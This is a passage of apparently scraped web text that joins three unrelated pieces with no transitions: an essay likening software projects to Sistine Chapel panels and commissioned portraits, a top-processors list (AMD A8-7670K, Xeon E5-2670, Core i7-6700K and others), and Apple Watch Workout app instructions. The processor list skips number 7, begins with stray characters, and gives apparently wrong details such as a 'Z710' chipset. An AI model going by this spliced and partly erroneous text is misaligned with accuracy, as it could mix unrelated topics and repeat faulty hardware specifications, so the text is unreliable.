There is surely a tale that explains the bare tail of the mooning angel, but for now let’s assume that the Pope discovered the mooning angel and demanded that it be replaced. If the panels weren’t independent, then the replacement of one panel would entail replacing some adjacent panels as well—and if you had to use different pigments because the originals weren’t available, maybe you have to replace thenext set of panels that were indirectly affected. Let the nightmare begin. But as it stands, the panels are independent, so the offending angel (who was apparently on Spring Break) could have been easily replaced with a less caustic image and the rest of the project would remain unaffected.

Conceptual Integrity

But despite that independence, there is conceptual integrity—the style, the themes, the mood, tie it all together. In computer languages, Smalltalk has conceptual integrity, so does Ruby, so does C. C++ doesn’t: it tries to be too many things at once, so you get an awkward marriage of concepts that don’t really fit together well.

The trick then is to divide up your work while maintaining a holistic integrity; each Sistine Chapel panel is a separate piece of art, complete unto itself, but together they tell a coherent story.

For our projects, we have several techniques we need to use inside code, including modularity, decoupling, and orthogonality. At the project level, consider architecting the project as a collection of many small applications that work together. These interacting applications might simply use a network connection or even flat files, or a heavier-duty component technology such as Enterprise Java Beans (EJB).

Time

Up until now, we’ve concentrated on splitting up a project in space, but there is another very import dimension that we need to touch on briefly—time. In the time dimension, you need to use iterations to split up a project.

Generally speaking, you don’t want to go more than a few weeks without a genuine deliverable. Longer than that introduces too large of a feedback gap—you can’t get the feedback quickly enough in to act on it. Iterations need to be short and regular in order to provide the most beneficial feedback.

The other important thing about iterations is that there is no such thing as 80% done. You can’t get 80% pregnant—it’s a Boolean condition. We want to get to the position where we only ship what really works, and have the team agree on the meaning of words like “done”. If a feature isn’t done, save it for the next iteration. As the iterations are short, that’s not too far off.

In time or space, feedback is critical. For individual pieces of code, it is vital to have competent unit tests that will provide that feedback. Beware of excuses such as “oh, that code’s too complicated to test.” If it’s too complicated to test, then it logically follows that the code is too complicated to write! If the code seems to be too complicated to test, that’s a warning sign that you have a poor design. Refactor the code in order to make it easy to test, and you’ll not only improve the feedback loop (and the future extensibility and maintainability of the system), you’ll improve the design of the system itself.

3. Satisfying the Sponsor

Now comes the hard part. So far, we’ve talked about problems that have simple, straightforward answers. Organize your system this way; always have good unit tests; look for and apply feedback to improve the code and the process; etc. But now we’re headed into much more uncertain terrain—dealing with people. In particular, dealing with the sponsor: the person or persons who are paying to make this project happen. They have goals and expectations all their own, and probably do not understand the technology with which we create the work. They may not know exactly what they want, but they want the project to come out perfect in the end.

This must be the artist’s worst nightmare. The person paying for the portrait is also sitting for it, and says simply “Make me Look Good”. The fact that the sitter is royalty who commands a well-oiled guillotine doesn’t help. Sounds pretty close to the position we find ourselves in as we write software, doesn’t it?

Let’s look at it from the sitter’s point of view. You commission an artist to paint you. What do you get? Perhaps a traditional, if somewhat flat looking portrait such as da Vinci’s Portrait of Ginevra Benci in 1474. Or maybe the realistic, haunting face of Vermeer’s Girl With a Pearl Earring. How about the primitive (and topless) look of Matisse’s Seated Figure, the wild and fractured Portrait of Picasso by Juan Gris, or the stick-figured jumble of Paul Klee’s Captive?

All of these are portraits, all interpretations of a commonplace thing—a human face. All of which correctly implement the requirements, but all of which will not satisfy the client.

Know the best of computer processors

jkWhat makes a processor look so great? Somebody saythat it’s how expensive it is, while others suggest it’s the number of cores or its overclockability that determines the quality of a CPU. In reality, it’s a matter of personal preference backed by some hard numbers.

You would likely be disappointed if you shelled out a small fortune just to build a machine that only ends up being used for typing up documents. Likewise, thinking you could save some money by skimping out on the CPU in your gaming rig would be an equally misguided decision.

Here are our picks for the top 10 best processors you can find right now for your desktop PC.

1. AMD A8-7670K

If you are an AMD enthusiast (or like rooting for the underdog), these are interesting times. AMD is about to launch a series of processors based on a new architecture (Zen) which will obliterate the current generation of CPUs. So prices are falling accordingly. The A8-7670K remains one of the rare bright spots in AMD’s lineup despite being more than two years old.

It is built on a newer 28nm manufacturing process which kind-of explains why it has a 95W TDP – thermal design power, or a part’s share of your power supply’s available Watts – despite a relatively high base and turbo clock speed (3.6GHz and 3.9GHz). Its graphics performance is where it shines thanks to an onboard GPU that is slightly more powerful than the Radeon R7 240 GPU (six compute units, 384 shader cores, 757MHz GPU clock speed).

2. Intel Xeon E5-2670

One of the best kept secrets in the world of computer hardware is that, every now and then, data centers around the world, operated by some of the biggest tech companies in the world, dump hundreds, if not thousands of processors as they migrate to newer, faster and more power efficient models.

When that happens, they usually end up on eBay or on Amazon, where you can buy them for a fraction of their price (usually one tenth). The Sandy-Bridge E5-2670 v1 is one of them; it’s second-hand price is one-tenth of its retail price. Grab a pair of them to construct a workstation rig that would put Intel’s current finest CPU to shame with a total of 16 cores, 32 threads and 40MB cache.

3. Intel Core i3-6100

If you want to do some heavy lifting but don’t want to blow your savings on a piece of silicon, then check out this chip. The Intel Core i3-6100 is the cheapest Core processor based on the new Skylake architecture, and you don’t have to fork out a fortune for it.

True, you’ll want to pair it with a motherboard with a decent chipset (Z710) in order to run faster memory (2.66GHz), but that isn’t necessary. It is not a K-model, and there are two SKUs, the 6100 (higher TDP and higher clock speed) and the 6100T (lower TDP, lower clock speeds) so make sure you choose the right one.

Using a 14nm node, it reaches 3.7GHz with a 65W TDP; its dual-core/4-thread configuration should make for a decent gaming rig, and the 4K-capable Intel HD 530 GPU is clocked at 350MHz. Oh and it should make a fairly good overclocker as well.

4. AMD Sempron 3850

At the other end of the spectrum is the Sempron 3850, one of AMD’s cheapest quad-core processors. It sports a Kabini core and is built on a 28nm process, which explains why its TDP only reaches 25W, almost one seventh of the FX-9590.

Obviously, the fact that it runs at only 1.3GHz also helps a lot. Add in the fact that it comes with an integrated AMD Radeon HD 8280 GPU (basic, but decent) and you get something that’s better than most Baytrail-based systems at least. The best part though has to be the price; it is cheap especially, as it includes the heat sink and the fan; that means that you can envisage getting a motherboard bundle for less than Intel’s cheapest CPU. A shame that it has only one memory channel though.

5. Intel Core i7-6700K

This is Skylake, Intel’s sixth Core generation. The i7-6700K, which cost just under $345 (£290, about AU$463), is the company’s most powerful Skylake model set to replace the Broadwell-based desktop processors in the short term.

Here we’ve got a pretty powerful processor boasting four cores, eight threads, 8MB cache, a base clock speed of 4GHz, a turbo-boost of 4.2GHz and an Intel HD Graphics 530 subsystem inside. Overclocking is what may get some of us excited, however, as it’s the distinguishing feature of the “K” models such as itself.

Pair that with a decent 100-series chipset, an oversized HSF and a couple of overclocker-friendly DDR4 memory modules, and watch it fly. And, although you’ll want to pay close attention to that 91W TDP, 5.0GHz isn’t a lofty goal with the 6700K.

6. Intel Core i5-4690K

There is a good reason why the Intel Core i5-4690K is among the best-selling processors on Amazon.

This Devil’s Canyon part is one of the most, if not the most affordable K-series processor from Intel’s Core range at $239 (£182, about AU$321) and as such can overclock fairly easily with modest efforts. It has a base frequency of 3.5GHz with many users reporting being able to hit 25% increase in speed using a decent aftermarket HSF.

The 4690K doesn’t come with hyper-threading, but for the price it wasn’t expected. The processor, bilt on the 22nm fabrication process, packs 6MB of L2 cache, an 88W TDP and even an Intel HD Graphics 4600 onboard GPU.

8. AMD FX-8320E

Meet the AMD FX-8320E; this is one of the cheapest eight-core processors on the market and costs a smidgen under $110 (£108, about AU$148) on Amazon.

Built on a mature 32nm node, it’s clear why the FX-8320E has such a high TDP (95W). Then again, maybe it’s not an unusual spec given the 3.2GHz clock speed. Plus, when needed, it can even boost all the way to 4GHz.

But don’t get your hopes too high, though. On most tasks, the FX-8320E will be outperformed even by a modest Haswell Core i3. Where it truly shines is when you throw multi-threaded jobs (encryption, encoding etc) at it, where it can beat even the more expensive Core i5 parts. What’s more, many users have been able to overclock the chip easily using a non-stock heatsink fan, some all the way up to 4.8GHz.

Workout App on the Apple Watch

It’s time to exercise, and the Apple Watch can help you track your workout sessions. In this except from Apple Watch. Jason Rich shows you how you can set a Caloric, Distance, or Time goal, and then have the watch display real-time data it collects as you pursue that goal during your workout

The Workout app is somewhat similar to the Activity app, but instead of being designed for use at all times while you’re wearing the watch, this app allows you to collect and analyze data related to actual workouts.From the book

To use this app, launch it from the Home screen of the Apple Watch (see Figure 5.23), and from the main menu, select the fitness-related activity you’re about to participate it. Options include Outdoor Walk, Outdoor Run, Outdoor Cycle, Indoor Run, Indoor Walk, Indoor Cycle, Elliptical, Rower, Stair Stepper, or Other.

Based on which option you select, for each workout, typically you can set a Caloric, Distance, or Time goal, and then have the watch display real-time data it collects as you pursue that goal during your workout.

When you’re ready to begin a workout, follow these steps to activate the Workout app on your watch:

    1. From any watch face you’ve selected to be displayed on the watch’s screen, press the Digital Crown to access the watch’s Home screen.
    2. Tap on the Workout app icon to launch the Workout app.
    3. When the main menu appears, tap on the type of workout you plan to engage in.
    4. Depending on the activity you select, a submenu screen enables you to Set Calories, Set Time, or Set Miles, or select Open (if you have no goal in mind, but simply want to track your workout-related data). If you select the Set Time screen, a timer appears, showing 0:00, with a negative sign (–) icon on the left and a plus sign (+) icon on the right. Tap the + icon to set the desired duration for your workout. Press the Start button, shown in Figure 5.24, to begin your workout.